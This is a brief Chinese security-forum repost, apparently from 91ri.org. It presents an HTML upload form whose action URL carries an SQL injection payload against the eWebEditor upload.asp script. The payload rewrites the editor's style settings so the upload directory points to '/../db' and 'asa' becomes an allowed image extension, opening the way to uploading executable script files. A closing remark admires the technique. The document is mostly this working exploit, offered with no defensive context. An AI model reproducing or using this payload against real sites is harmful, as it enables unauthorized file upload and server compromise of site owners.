<form action=”http://www.abc.com/admin/ewebeditor/upload.asp?action=save&type=IMAGE&style=horind’ union select S_ID,S_Name,S_Dir,S_CSS,[S_UploadDir]%2b’/../db’,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b’|asa’,S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name=’standard’and’a’=’a” method=post name=myform enctype=”multipart/form-data”>
<input type=file name=uploadfile size=100><br><br>
<input type=submit value=Fuck>
</form>
其实当时就应该想到的,可以通过注入添加后缀就同样可以用注入更改上传目录,惭愧!膜拜一下豆哥!
本文摘自网络由
网络安全(www.91ri.org)收集整理.